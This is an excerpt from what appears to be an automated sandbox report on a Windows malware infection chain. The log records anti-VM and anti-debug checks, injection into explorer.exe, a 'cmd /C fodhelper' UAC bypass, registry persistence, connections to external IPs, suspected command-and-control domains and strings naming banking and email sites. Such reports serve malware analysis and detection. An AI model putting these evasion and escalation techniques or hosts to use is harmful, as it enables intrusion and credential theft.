Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: explorer.exe, 00000002.00000000.2113563254.000000000C474000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
Source: explorer.exe, 00000022.00000003.3248989137.000000000C148000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000D&@v
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
Source: A0B.exe, 00000017.00000003.3024777323.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: \\.\HGFS`
Source: explorer.exe, 00000022.00000003.3298895150.000000000C16B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\My9}
Source: explorer.exe, 00000022.00000003.4414268907.000000000952E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: DB15.exe, 00000013.00000002.4525021781.0000000003100000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: explorer.exe, 00000002.00000000.2110113315.0000000009605000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: explorer.exe, 00000022.00000003.4418026226.000000000943F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMWare
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: explorer.exe, 00000022.00000003.3298503526.000000000C1FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000u
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: explorer.exe, 00000022.00000002.4516726316.0000000001453000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\AppData\Local\Temp\DB15.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_027D171C rdtsc 11_2_027D171C
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_00408F94 IsDebuggerPresent, 11_2_00408F94
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 12_2_0042A57A
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 17_2_00481920
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle, 12_2_00412220
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00C20D90 mov eax, dword ptr fs:[00000030h] 0_2_00C20D90
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00C2092B mov eax, dword ptr fs:[00000030h] 0_2_00C2092B
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00D26106 push dword ptr fs:[00000030h] 0_2_00D26106
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_00C70D90 mov eax, dword ptr fs:[00000030h] 6_2_00C70D90
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_00C7092B mov eax, dword ptr fs:[00000030h] 6_2_00C7092B
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_00CB3CF6 push dword ptr fs:[00000030h] 6_2_00CB3CF6
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_027D00A3 push dword ptr fs:[00000030h] 11_2_027D00A3
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02870042 push dword ptr fs:[00000030h] 11_2_02870042
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_027D60A3 push dword ptr fs:[00000030h] 16_2_027D60A3
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02870042 push dword ptr fs:[00000030h] 16_2_02870042
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_00408A9A GetProcessHeap, 11_2_00408A9A
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_00408268 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00408268
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004329BB SetUnhandledExceptionFilter, 12_2_004329BB
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_004329EC
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_004329BB SetUnhandledExceptionFilter, 17_2_004329BB

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\explorer.exe File created: DB15.exe.2.dr Jump to dropped file
Source: C:\Windows\explorer.exe Network Connect: 172.67.156.20 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.94.159.197 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 189.232.22.59 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.253.115.138 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.185.16.114 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.159.129.233 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.23.232.80 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.67.207.127 443 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02870110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 11_2_02870110
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Thread created: C:\Windows\explorer.exe EIP: 2DF19A0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Thread created: unknown EIP: 2F519A0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Memory written: C:\Users\user\AppData\Local\Temp\DB15.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Memory written: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Memory written: C:\Users\user\AppData\Local\Temp\DB15.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Memory written: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Memory written: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Memory written: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe Memory written: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe base: 400000 value starts with: 4D5A
Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: associationokeo.shop
Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: turkeyunlikelyofw.shop
Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: pooreveningfuseor.pw
Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: edurestunningcrackyow.fun
Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: detectordiscusser.shop
Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: problemregardybuiwo.fun
Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: lighterepisodeheighte.fun
Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: technologyenterdo.shop
Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: resergvearyinitiani.shop
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\gtdirat Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe Section unmapped: unknown base address: 400000
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 12_2_00419F90
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\Temp\DB15.exe C:\Users\user\AppData\Local\Temp\DB15.exe Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --Task Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\Temp\DB15.exe "C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe"
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Process created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Users\user\AppData\Local\Temp\71C9.exe "C:\Users\user\AppData\Local\Temp\71C9.exe"
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: explorer.exe, 00000002.00000000.2107021986.00000000013A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: explorer.exe, 00000022.00000002.4516726316.0000000001430000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +ProgmanC
Source: explorer.exe, 00000002.00000000.2107021986.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107887312.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2107021986.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000002.4531229411.00000000053B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2106796270.0000000000D69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +Progman
Source: explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanC
Source: explorer.exe, 00000002.00000000.2107021986.00000000013A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2110427730.00000000098AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd31A
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028980F6 cpuid 11_2_028980F6
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 11_2_028B0AB6
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 11_2_0289C8B7
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 11_2_028A49EA
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 11_2_028A394D
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 11_2_028A3F87
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 12_2_0043404A
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 12_2_00438178
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 12_2_00440116
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 12_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 12_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 12_2_00438423
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: EnumSystemLocalesW, 12_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: GetLocaleInfoW, 12_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 12_2_00432B6D
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 12_2_00432FAD
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 12_2_004335E7
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW, 12_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: EnumSystemLocalesW, 12_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 12_2_00437E83
